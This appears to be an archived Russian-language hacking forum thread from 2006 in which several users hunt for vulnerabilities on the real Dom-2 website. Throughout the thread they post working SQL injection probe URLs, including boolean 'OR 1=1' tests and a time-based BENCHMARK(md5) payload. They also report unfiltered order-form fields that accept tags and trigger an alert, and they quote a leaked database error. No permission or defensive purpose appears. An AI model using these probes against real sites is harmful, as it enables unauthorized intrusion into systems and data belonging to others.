PDA

Просмотр полной версии : Дом 2


+toxa+
05.05.2006, 00:31
1)_http://connect.dom2.ru/view/user/index.do?id=3763'32
репорт об ошибке

2)_http://www.dom2.ru/shop/index.phtml?prod=55)
Добился чего-то) Вроде как полноценная SQL

3)_http://www.dom2.ru/shop/index.phtml?prod=55 OR 1=1
_http://www.dom2.ru/shop/index.phtml?prod=55 OR 1=0
разные значения выводятся...

Продолжаю поиски....

gadjet
05.05.2006, 07:46
Так держать! Это уже надоедает ("начался 145739 день нашей стройки...")

k1b0rg
05.05.2006, 08:50
первая репорт явы. Нах он нужен.
Второе и третье скули, но ты ничего ельзя сделать из-за фильтров

+toxa+
05.05.2006, 17:40
4)_http://www.dom2.ru/journal/index.phtml?day=622)
а вот такая вот как?)

dinar_007
06.05.2006, 23:29
4-я поинтересней, но ИМХО с её помощью тоже ничего к сожалению не поделаешь... Админы дома 2 тоже не такие уж и дураки...

+-------------------------------------------------------+
| _http://www.dom2.ru/shop/index.phtml?prod=55 OR 1=1 |
| _http://www.dom2.ru/shop/index.phtml?prod=55 OR 1=1 |
+-------------------------------------------------------+

Не пойму, в чём тут разница...

+toxa+
06.05.2006, 23:30
Упс.... исправил....

SanyaX
07.05.2006, 00:50
_http://www.dom2.ru/shop/puttocart.phtml

+toxa+
07.05.2006, 01:01
По адресу __http://www.dom2.ru/shop/order.phtml не фильтруются вводимые поля, пропускает все теги и по адресу __http://www.dom2.ru/shop/confirmpay.phtml алерт вылетает свободно... Как обстоит дело на той стороне, когда заказ послан, хз...

2 SanyaX
Толку 0 ....

SponS
07.05.2006, 17:02
http://www2.dom2.ru/shop/?cat=.index.phtml короче если такую шляпу ввести,то
Query Error!
Unknown table 'index' in where clause

SponS
07.05.2006, 17:04
Тут давно читал как Дом-2 ломали,так ием кто ломал пришлось сперва свалить Севант ТНТ потом ещё какой-то,я не помню(ГОЛОД чтоль?!) а потом они уже до дома дошли....

dinar_007
08.05.2006, 17:17
http://www.dom2.ru/journal/index.phtml?day=BENCHMARK(10000000,BENCHMARK(10000 000,md5(current_date)))

Выходит "error", но думаю, что это ничего не даст =(